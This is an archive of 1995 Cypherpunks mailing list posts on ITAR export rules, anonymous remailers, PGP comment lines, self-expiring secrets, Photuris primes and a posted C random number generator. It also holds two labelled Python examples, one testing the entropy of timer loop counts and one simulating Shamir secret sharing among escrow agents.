written to take the current situation into consideration.  It is written
to deal with physical equipment and concepts that only a small number
of people understand.  Given those parameters ITAR would work, but
given the current climate of readily available crypto software and
widespread understanding of crypto technologies ITAR cannot do what
it was designed to do.

>
>> Go read the section that I quoted again.  Where is there an exception
>> for foreign persons who happen to be abroad?  
>
>It's inherent. You simply can't apply US-law to non-US-citizens outside
>the U.S.!  

Quite to the contrary, U.S. law applies wherever the U.S. can enforce
it.  There are many U.S. laws that the U.S. attempts to enforce
outside the U.S..  One example is that the U.S. law allows the
abduction of those who have murdered U.S. citizens outside the United
States.  This law is in place in an attempt to protect U.S. citizens
from terrorism.  If you do not believe me just ask Manuel Noriega
(sp?).


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@utopia.hacktic.nl (Matthew Ghio)
Date: Fri, 10 Nov 1995 08:30:15 +0800
To: cypherpunks@toad.com
Subject: Re: encrypt-key remailers
In-Reply-To: <Pine.SOL.3.91.951107143109.23860A-100000@gorf.rs.itd.umich.edu>
Message-ID: <199511080318.EAA29662@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jennifer Mansfield-Jones (cardtris@umich.edu) wrote:

>  ::
>  Encrypt-Key: apasswd
>  Request-Remailing-To: cardtris@umich.edu
>  Subject: reply-block-test
>  
>  **
...

>  
> Trying the above, I find that it does *sort of* work as a reply
> block.  If I append sample text and send everything to
> remailer@flame.alias.net, I get a reply back that looks like, for
> instance: 
>
> Date: Mon, 6 Nov 1995 19:22:13 +0100
> From: Anonymous <nobody@flame.alias.net>
> To: cardtris@umich.edu
> Subject: reply-block-test
>
> **
>
>
> The appended text, which I expected to come back conventionally
> encrypted with 'apasswd', has just vanished into the void.  
> Obviously I'm missing something... probably something that seemed 
> painfully obvious to the writer of the remailer help file.  If I 
> omit the encryption key and '**', I can get reply blocks to work fine,
> even chained through multiple remailers.  Suggestions?

This is a configuration problem at the remailer, most likely a missing 
randseed.bin file.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Thu, 9 Nov 1995 08:54:31 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951108054335.22856D-100000@akamai.pixi.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 7 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> to protect the privacy of communications.  PGP can bite you.
> The PGP comment feature lets you stick one (or more?) lines of comment
> into your encrypted messages, after the Version: line but before the
> encrypted message body.  If you use the PGP comment feature to say something

---- 8< snip

> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.7.1
> Comment: PGP available outside U.S.A. at ftp.ox.ac.uk
> 

You are using Viacrypt PGP, which has a release out which fixes the 
comment "feature" - contact them for an upgrade.

This was fixed in the freeware version some time ago as well.

-NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    http://www.pixi.com/~netsurf   >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bglassle@kaiwan.com (Bob Glassley)
Date: Wed, 8 Nov 1995 15:13:20 +0800
To: cypherpunks@toad.com
Subject: Lotus Notes RSA Implementation Question
Message-ID: <199511080702.XAA22876@kaiwan.kaiwan.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am currently considering using Lotus Notes for a group-ware solution
where security is of great importance.  I have studied Notes
documentation regarding thier implementation of the RSA encryption
library, but it leaves some unanswered questions.

If anyone on the list has knowledge of the following items, I would be
very gratefull.

1)  What is the key size used by the USA licensed version?

2)  Considering RC4 is a proprietary scheme, have there been any
concerted efforts to validate it's strength or lack of?  If so, could
you give a pointer to any documents I could review.

...Bob Glassley

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKBVtW7xvKhVs/sNAQHCowP+LF2stvSPzatDfAkKx2DfU8sH5S7p6KwN
PwDEak9it1Uq0eALHWVTc3VZ3WYY+6XIjYNnNyfdKsgehXb+2dVEgjz1qbHyK+uE
3JhlYOeCfBcXUrTbilAoYXghJHvrpJq8z+Pa6u2W5Wgxks+t9MYzjV3YKLM2Nj6Z
y6jbBUcyyNc=
=TN1O
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Curtis <jbell@capecod.net>
Date: Wed, 8 Nov 1995 20:31:36 +0800
To: cypherpunks@toad.com
Subject: expiration dates on cryptography
Message-ID: <01BAADAA.DFB5F740@hy36.capecod.net>
MIME-Version: 1.0
Content-Type: text/plain


The discussion between Mr. May and Mr. Shields concerning
time-release cryptography raised an interesting question in my 
mind.

Given that trust is often of an ephemeral nature, it would be
quite useful to set time limits on secrets.  Would it be possible
to cryptographically protect a secret such that it could not be
decrypted after a certain time?

I suspect that the laws of thermodynamics might prohibit this
in classical cryptography because as a message expired the 
amount of entropy would decrease.  Quantum cryptography
might work, but that will be science fiction for some time to
come.

Has anyone either shown how to do this or proven it impossible?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 22:17:03 +0800
To: John Curtis <jbell@capecod.net>
Subject: Re: expiration dates on cryptography
In-Reply-To: <01BAADAA.DFB5F740@hy36.capecod.net>
Message-ID: <199511081406.JAA00267@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Curtis writes:
> The discussion between Mr. May and Mr. Shields concerning
> time-release cryptography raised an interesting question in my 
> mind.
> 
> Given that trust is often of an ephemeral nature, it would be
> quite useful to set time limits on secrets.  Would it be possible
> to cryptographically protect a secret such that it could not be
> decrypted after a certain time?

No.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 22:19:22 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511080306.TAA10540@jobe.shell.portal.com>
Message-ID: <199511081408.JAA00279@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> I wish that Detweiler could (seriously) go back to wherever he came from. 

What a fascinating statement to make, considering that you are
probably Detweiler.

> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
> 
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Thu, 9 Nov 1995 08:09:21 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <199511081517.JAA00972@galil.austnsc.tandem.com.>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@lighthouse.homeport.org> said:

AS> 	Thus, if the user in Italy has no reason to expect that their
AS> mail to Germany will traverse the US, then I suspect that the US
AS> would have a hard time proving any criminal act.  Doesn't a criminal
AS> act require intent of some type?  If IP routing, in conjunction with
AS> SMTP, beyond the control of the users, ships packets through the US,
AS> I have a hard time believing that that makes those users criminals.

	IANAL, but if they have the intent to transfer cryptographic
software, and can 'reasonably' (wonderful precision there) be expected
to know that there is the potential for portions of the transfer to be
routed through US systems, then I'm guessing that it could be construed
that they had the intent to commit a crime.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 9 Nov 1995 08:19:58 +0800
To: John Curtis <jbell@capecod.net>
Subject: Re: expiration dates on cryptography
Message-ID: <199511081549.JAA28561@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:21 AM 11/8/95 -0500, John Curtis wrote:
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?
   It's a nice idea, really.  The problem is - how do you verify the
absolute time?  For instance, by resetting a PC's internal clock
you can instantly circumvent that measure.  Possibly by forcing
the application to consult a "reliable" clock like one of the
cesium clocks, but that could be hacked.
   Unless you can absolutely, reliably, and without fear/danger of
being hacked around, verify the correct time, self-destruct crypto
probably won't happen.
----- David E. Smith, dsmith@midwest.net, PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 9 Nov 1995 08:10:33 +0800
To: whitaker@sover.net
Subject: Re: toolkits?
Message-ID: <9511081640.AA27938@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain




> >
> >Third - provide services to the citizenry.  For example - provide
> >a public key server.  Or how about a digital time-stamping service.
> >If the crap was kept out of these services, and they were free for
> >anyone to use, then it would advance the idea of encouraging people to
> >use crypto in their daily lives.
> >
> 
> Now we're getting specific. These are things that us ordinary folk can do
> which show the 'leaders' how to follow. What software, hardware,
> applications, support and sysadmin experience is required and where is it
> available on what terms. What are the cash flow opportunities to support
> such services?

PGP Public key servers - see MIT's key server as a good example.
Digital time-stamping service - see Betsie (sp?) from Bellcore 
as a basis.  These are things that are already out there, BUT 
I think that we can use more services like this.  Commercially
there probably isn't the demand to support these yet, but I think
we have a chicken and the egg problem here.  People can't use
encryption easily if they don't have good access to the tools, 
but people won't demand services like key-servers until they 
start using the tools.

A good service would be to provide and support distribution 
of privacy enhancing tools to universities and companies that
want them.  i.e. have people who will help set up firewalls,
PGP, encrypted telnet (pick your flavor), etc. 

A state wide group that has grants to provide internet connectivity
for universities and companies could have a person that does
nothing but work with these companies to help incorporate 
encryption into their networks. For instance, my employer 
has hardware engineers putting VLSI designs on tape, and then
fed-ex'ing them to the chip manufacturer, because they can't 
get good encryption set up that allows secured ftp transfers.
(and get the manufacturer to agree to the same encryption 
technology, etc. etc. etc.)

Yes - I know that most of this stuff is out there already,
but having people *willing* to integrate it for you without
charging an arm and a leg would go a long way towards convincing the
suits that this is a *good* thing.  

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 Nov 1995 00:06:45 +0800
To: dreschs@mpd.tandem.com (Sten Drescher)
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <199511081517.JAA00972@galil.austnsc.tandem.com.>
Message-ID: <199511081544.KAA06043@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Since the size of the net is more than doubling each year,
over half the people online at any given time are newbies.*  It is not
reasonable to expect a newbie to understand IP routing.  Neither IP
routing nor the design of the backbone is intuitively obvious.
Therefore, it is not reasonable to assume that a user in Italy or
Germany has any idea that their packets might travel through the
United States.  

	Nor is it reasonable to assume that a user outside the US is
familiar with the ITARs.  They're an obscure set of regulations, on
the surface contrary to the First Amendment, and not even well known
within the United States.

	I find it hard to believe that given the obscurity of IP
routing, the backbone design, and the obscurity of the ITAR that a
jury would find a foreign person guilty of unknowing violations of
the ITAR.  Any comment on this line of reasoning from our lawyer
friends?

Adam


Sten Drescher wrote:
| Adam Shostack <adam@lighthouse.homeport.org> said:
| 
| AS> 	Thus, if the user in Italy has no reason to expect that their
| AS> mail to Germany will traverse the US, then I suspect that the US
| AS> would have a hard time proving any criminal act.  Doesn't a criminal
| AS> act require intent of some type?  If IP routing, in conjunction with
| AS> SMTP, beyond the control of the users, ships packets through the US,
| AS> I have a hard time believing that that makes those users criminals.
| 
| 	IANAL, but if they have the intent to transfer cryptographic
| software, and can 'reasonably' (wonderful precision there) be expected
| to know that there is the potential for portions of the transfer to be
| routed through US systems, then I'm guessing that it could be construed
| that they had the intent to commit a crime.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Nov 1995 09:00:27 +0800
To: cypherpunks@toad.com
Subject: DUF_ibf
Message-ID: <199511081552.KAA06338@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Pal has provided a gopher-FBI paper:


   "Computer Crime Categories: How Techno-criminals Operate."
   By David L. Carter, a professor in the School of Criminal
   Justice, Michigan State University

   Types of Computer Crimes

      Computer As the Target
      Computer As the Instrumentality of the Crime
      Computer Is Incidental to Other Crimes
      Crimes Associated With the Prevalence of Computers

   Perspective on Legal Issues

   Special Problems with Computer-Related Crime

      Intellectual Property
      Malfeasance by Computer
      International Issues

   Conclusion

      Criminals have adapted the advancements of computer
      technology to further their own illegal activities.
      Unfortunately, their actions have far out-paced the
      ability of police to respond effectively.


   DUF_ibf  (21 kb in two parts)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 08:10:01 +0800
To: Frank Andrew Stevenson <frank@funcom.no>
Subject: Re: True Random (short c-source)
In-Reply-To: <Pine.SGI.3.91.951108165325.25592A-100000@odin>
Message-ID: <199511081613.LAA00447@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



What you are doing, basically, is using the processor execution time
loops to measure jitter in the return of the value of clock(). I don't
know how clock() works but I would venture to guess that the jitter is
more predictable than you think.

.pm

Frank Andrew Stevenson writes:
> I have written a short random number generator which appears to produce
> reasonable random numbers even in DOS, at the heart of the code is the
> short function fGetRand, the amount of entropy derived from this
> function varies from >1 to >>6 depending on system load, I haven't
> made any effort to whiten it at all. I am not making any claims about
> its usefulness. I am only trying to demonstrate the ease at which
> good random numbers may be obtained. Any comments and analysis will be
> mostly welcome, the source is hereby placed in the public domain:
> 
> I have used WATCOM10 to compile and test under DOS/WIN95, where
> clock is running at 18hz. I have also tested on IRIX with impressive
> results.
> 
> --- START ----
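> #include <time.h>
> #include <stdio.h>
> #include <stdlib.h>   /* exit() */
> 
> int   fGetRand (void);
> 
> int main (void) {
>    long vCount;
>    FILE *out;
>    int byte = 0;      /* accumulates sampled bits, most significant first */
>    int tick;
> 
>    out=fopen("random.bin","wb");
>    if(out==NULL) {
>       printf("cant write to file random.bin\n");
>       exit(1);
>    }
> 
>    for(vCount=1;vCount<=512;vCount++) {
>       tick=fGetRand()&0x01;     /* keep only the low bit of the loop count */
>       byte=byte+byte+tick;      /* shift left and append the new bit */
>       if((vCount & 0x7)==0) fputc((char)byte,out);   /* packed byte every 8 bits */
>       fputc((char)tick,out);    /* each raw bit is also written as its own byte */
>    }
> 
>    fclose(out);
>    return 0;
> }
> 
> 
> /* Count loop iterations until the value returned by clock() changes. */
> int   fGetRand (void) {
>    int count = 0;     /* start every measurement from zero */
>    clock_t tick;
> 
>    tick=clock();
>    while(tick==clock()) count++;
> 
>    return (count);
> }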
> ----- END -----
> 
> PGP encrypted mail preferred, finger for key.
> The above views are ONLY endorsed by BoggleMind Inc. (not to be confused
> with MindBoggle Ltd.)
> 
> 
> 
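
The predictability objection raised in this reply can be checked on recorded loop counts. The following is an added example in Python, not part of the thread or of the posted C program: it compares a frequency-only entropy figure with a first-order conditional estimate. The sample data is constructed, and `collect_counts`, `assess` and the 0.1-bit margin are assumptions made for the illustration.

```python
import math
import random
import time
from collections import Counter

def collect_counts(n, clock=time.process_time):
    """Analogue of the posted fGetRand(): spin until the clock value changes.
    Not called below; use it to gather counts on a real machine."""
    counts = []
    for _ in range(n):
        count, tick = 0, clock()
        while clock() == tick:
            count += 1
        counts.append(count)
    return counts

def low_bits(counts):
    """The generator keeps only the least significant bit of each count."""
    return [c & 1 for c in counts]

def shannon_bits(seq):
    """Zero-order entropy (bits/sample): looks at symbol frequencies only."""
    n = len(seq)
    return -sum(c / n * math.log2(c / n) for c in Counter(seq).values())

def conditional_bits(seq):
    """First-order estimate of H(X_t | X_{t-1}): what is still unknown about a
    sample once the previous sample has been seen."""
    if len(seq) < 2:
        return 0.0
    pairs = Counter(zip(seq, seq[1:]))
    prev = Counter(seq[:-1])
    n = len(seq) - 1
    h = 0.0
    for (a, _b), c in pairs.items():
        h -= c / n * math.log2(c / prev[a])
    return h

def assess(counts, margin=0.1):
    """Flag a source whose bits look balanced but follow from their predecessor."""
    bits = low_bits(counts)
    h0, h1 = shannon_bits(bits), conditional_bits(bits)
    return {"zero_order": h0, "conditional": h1, "predictable": h1 < h0 - margin}

# Constructed sample: the loop count alternates between two values, as it would
# if the loop period beat regularly against the timer tick.
ALIASED_COUNTS = [1000, 1001] * 256

# Constructed reference: counts from a seeded PRNG, standing in for a source
# whose low bit has no first-order structure.
_rng = random.Random(1995)
REFERENCE_COUNTS = [_rng.getrandbits(16) for _ in range(4096)]

if __name__ == "__main__":
    for name, data in (("aliased", ALIASED_COUNTS), ("reference", REFERENCE_COUNTS)):
        print(name, assess(data))
```

The aliased sequence has a perfectly balanced low bit, so a frequency count credits it with a full bit per sample, while the conditional estimate shows that each bit is determined by the one before it.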




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 08:42:22 +0800
To: cypherpunks@toad.com
Subject: Re: expiration dates on cryptography
Message-ID: <acc62dde07021004cd59@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 PM 11/8/95, John Curtis wrote:
>The discussion between Mr. May and Mr. Shields concerning
>time-release cryptography raised an interesting question in my
>mind.
>
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?

An interesting twist.

There are two broad things to consider:

1. Cryptography, what can mathematically be done.

2. Economics and social systems, what "business ecologies" can do.

Pure cryptography is about #1, with minimal consideration of #2. Much of
what interests me involves #2.

How this relates to your interesting question goes as follows.

Even the "timed-release cryptography" is NOT a pure cryptographic system,
as the idea of "temporal state" in crypto is iffy. That is, clocks can be
jiggered. Even "sealed clocks" can be jiggered.

But just as Haber and Stornetta's "digital timestamps" use time, such a
thing is possible once _economic agents_ enter the picture. And once
economic considerations are used.

The "timed-release crypto" system depends for its security on the
likelihood that N agents holding pieces of something--something they don't
know the value of--will likely hold those pieces for as long as they are
being paid.

(If you want to discuss why this is likely, even in a world of mistrust and
malice, we can discuss it.)

"Self-destruct crypto" would work roughly the same way:

-- N agents holding pieces of puzzle, contracted to destroy those pieces on
such-and-such date.

It is likely that some or even all of them would comply, if properly paid.

Caveats:

1. Sure, they could make backups. Probably do. But just as archival files
are shredded, a system for eliminating "expired" files would be possible.

2. Sure, they could cheat. Ditto for "timed-release crypto." (Time is
symmetric for this problem.)

3. Again, the security of the system to a large extent depends on the N
agents not knowing what the pieces are part of, nor knowing who the other
holders are. They never know whether a given piece is part of an audit, a
test, etc.

4. There is a slight asymmetry, despite what I said, in that one can "test"
agents to see if they'll release their pieces as contractually obligated
to, but one can never be sure that agents have actually destroyed their
pieces.

5. Still, distributing a secret amongst, say, 30 agents and having them
"agree" to destroy their pieces on January 20, 2002, seems pretty likely to
result in the collective secret (n-out-of-m pieces) being recoverable after
that date.

Such a system would need more consideration of backup strategies, etc. (If
everyone is carefully backing up and the backup tapes are somewhere, then
quite clearly the secret would not be gone; hence the issue of backup
strategies.)


>I suspect that the laws of thermodynamics might prohibit this
>in classical cryptography because as a message expired the
>amount of entropy would decrease.  Quantum cryptography
>might work, but that will be science fiction for some time to
>come.

I'm always interested in the links between information theory, algorithmic
complexity, and notions of entropy, but I am skeptical in the extreme that
the "laws of thermodynamics" have anything to do with whether one can throw
away bits. If I make a list on my computer, and then erase it, have I
violated a "law of thermodynamics"? Of course not.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 9 Nov 1995 08:44:18 +0800
To: stewarts@ix.netcom.com
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Point well taken.

   I'm seriously considering completely disabling the PGP comment
feature when invoked from premail. In fact, that's what the new code
does right now.

   On an unrelated topic... cypherpunks like to count bits, right?
What is the correct number of pseudorandom bits to use in a MIME
multipart separator? If the data has a line which matches the
separator, the message is corrupted. Of course, if you can take
multiple passes through the data, you can simply verify that it does
not contain a line which matches the separator. But if you're
restricted to a single pass, then the only way to do it is to use a
randomly generated separator.
   I figure that 128 bits should _definitely_ be enough (that's what
is in the new premail code now). Even 64 bits should ensure that it is
unlikely that anyone will ever experience message corruption over the
expected lifetime of premail. However, it makes me nervous. What do
people think?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 9 Nov 1995 07:47:54 +0800
To: cypherpunks@toad.com
Subject: November Bay Area meeting? was: Decemeber SF Bay Area Cyperpunks
In-Reply-To: <199511080549.VAA04978@anemone.corp.sgi.com>
Message-ID: <47qmok$nnk@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511080549.VAA04978@anemone.corp.sgi.com>,
Katy Kislitzin  <ktk@anemone.corp.sgi.com> wrote:
>Hi--
>
>Eric Messick and I will be holding the December C'punks meeting at
>our geodesic dome in the Santa Cruz Mountains.  It will be a
>combination meeting and holiday get-together.  It will be happening on
>the usual c'punks saturday, Dec 9, but will start at 4:00 pm instead
>of the usual noon.  A more spirited announcement will follow closer to
>the date.

Speaking of which, did I miss an announcement of the November meeting?
My mail server was down for a few days, so it's entirely possible.
If that's the case, can someone repost it or send it to me?

Thanks,

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 Nov 1995 08:42:49 +0800
To: John Curtis <jbell@capecod.net>
Subject: Re: expiration dates on cryptography
Message-ID: <199511082002.MAA25560@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Hmmm, maybe I'd better get this message out quickly, before it expires... :-]

At 07:21 AM 11/8/95 -0500, John Curtis <jbell@capecod.net> wrote:
>The discussion between Mr. May and Mr. Shields concerning
>time-release cryptography raised an interesting question in my 
>mind.
>
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?

Decryption is equivalent to knowing a secret plus doing some work.

There are two ways to make information available/unavailable -
by depending on calculations from known data, or by having people
agree to publish/delete it.  The former method is trustable,
but doesn't have time built in to it - either you know stuff or you don't.
The latter method is harder to trust - you can build contractual mechanisms
to encourage people to keep their commitments, and use crypto methods like
splitting shared secrets to limit the impact of some of them not keeping them -
but it's basically not cryptographic.  

Getting people to keep information secret for a while and then publish
is possible; that's within their control.  Getting people to keep information
public, and then delete all the copies they own is possible, but if the
information is _public_, anybody in the world could have a copy - deleting
it requires finding them all, and getting them all to agree to delete it.
That's _much_ harder.

You could build a system where an escrow agent keeps a piece of information
private, but available upon request, and deletes it on a certain date.
That lets you know that _if_ nobody's asked for the information by then,
and the agent has done its job, that nobody else will be able to decrypt it.
Again, you can secret-share among multiple agents to decrease the impact
of defaults (either failure-to-delete or failure-to-deliver.)

A related approach is for the agent to provide a service of decrypting data
encrypted with the agent's public key, and agreeing only to decrypt data
before or after some date specified in the message.

Another technique you can use is for the agent to keep the data until
paid for delivery; the retrieval token includes a digital check
with an expiration date.  In this case, you're trusting the bank to 
not honor the check after its expiration date, and the escrow agent not to
deliver the data without getting paid.  For this service, you want checks
rather than cash - if the check goes stale, the money is still in your account.

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
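
The threshold trade-off behind the agent schemes in Timothy C. May's message and in the one above, as an added example that is not from either post: Shamir sharing over a prime field, where the threshold fixes both how many agents may fail to deliver and how many may fail to delete. The 30 agents and the January 20, 2002 date come from the earlier message; the threshold of 10, the field prime and the `Agent` model are assumptions.

```python
import secrets
from dataclasses import dataclass
from datetime import date

P = 2**127 - 1  # prime field for the shares (assumed size; the secret must be < P)

def split(secret, k, m):
    """Shamir: random degree-(k-1) polynomial with f(0) = secret; share i is (i, f(i))."""
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(k - 1)]
    def f(x):
        acc = 0
        for c in reversed(coeffs):      # Horner evaluation mod P
            acc = (acc * x + c) % P
        return acc
    return [(x, f(x)) for x in range(1, m + 1)]

def combine(shares):
    """Lagrange interpolation at x = 0; yields the secret only from >= k shares."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num = den = 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        total = (total + yi * num * pow(den, P - 2, P)) % P
    return total

@dataclass
class Agent:
    share: tuple
    expiry: date
    keeps_backup: bool = False   # breaks the contract: piece survives the expiry date
    unreachable: bool = False    # fails to deliver when asked

    def release(self, today):
        if self.unreachable:
            return None
        if today < self.expiry or self.keeps_backup:
            return self.share
        return None              # piece destroyed as agreed

def make_agents(secret, k, m, expiry):
    return [Agent(s, expiry) for s in split(secret, k, m)]

def recover(agents, k, today):
    """What a requester can reconstruct on a given day; None if below threshold."""
    shares = [a.release(today) for a in agents]
    shares = [s for s in shares if s is not None]
    return combine(shares[:k]) if len(shares) >= k else None

def tolerances(k, m):
    """(agents that may fail to deliver before expiry,
        agents that may fail to delete after expiry)."""
    return m - k, k - 1

if __name__ == "__main__":
    expiry = date(2002, 1, 20)
    agents = make_agents(123456789, k=10, m=30, expiry=expiry)
    for a in agents[:9]:
        a.keeps_backup = True
    print("tolerances (deliver, delete):", tolerances(10, 30))
    print("day before expiry:", recover(agents, 10, date(2002, 1, 19)))
    print("after expiry, 9 backups kept:", recover(agents, 10, date(2002, 1, 21)))
    agents[9].keeps_backup = True
    print("after expiry, 10 backups kept:", recover(agents, 10, date(2002, 1, 21)))
```

Raising the threshold makes expiry more robust against retained backups and availability before the date less robust against agents who vanish; lowering it does the reverse.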






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Thu, 9 Nov 1995 08:09:16 +0800
To: karn@qualcomm.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511080143.RAA22564@servo.qualcomm.com>
Message-ID: <9511081704.AA24263@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 7 Nov 1995 17:43:49 -0800 (PST)
   From: Phil Karn <karn@qualcomm.com>
   Cc: cypherpunks@toad.com, ipsec-dev@eit.COM

   > Our practical experiences with discrete logs suggests that the effort
   > required to perform the discrete log precomputations in (a) is slightly
   > more difficult than factoring a composite of the same size in bits.  In
   > 1990-91 we estimated that performing (a) for a k-bit prime modulus was
   > about as hard as factoring a k+32-bit composite.  [Recent factoring work
   > has probably changed this a bit, but it's still a good estimate.]

   This is also my understanding, which I got from you in the first
   place.  I take it there have been no dramatic breakthroughs in the
   last few years in the discrete log problem? How heavily has it been
   studied in comparison with factoring?

Factoring has received more attention than discrete log; certainly when
it comes to net-wide computations it's all factoring.  But that's partly
due, I think, to a lack of targets to attack.  

   Still, requiring support of a fixed modulus for shared public use is
   important to promote a basic level of interoperability. This has its
   risks, but it should be okay *provided* it's a strong prime of
   sufficient strength to preclude the precomputation of the discrete log
   tables by even a highly motivated and resourceful attacker. And as a
   backup the protocol should provide for the optional use of private
   moduli between consenting parties. Sound reasonable?

You definitely should allow any modulus between consenting parties.  As
for what moduli the standard says "must be" (vs. "should be") supported,
I don't know.  Maybe the right thing to do is require conforming
implementations to support a large modulus but include recommended
smaller moduli.  Then Alice can always force Bob to use the large
modulus but, if both agree, they can use something smaller from the
standard or even their own home-grown modulus.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Thu, 9 Nov 1995 08:15:34 +0800
To: cypherpunks@toad.com
Subject: Photuris 512bit Prime Challenge? (Re: Photuris Primality verification needed)
Message-ID: <v02130501acc6820ddefd@[204.144.184.50]>
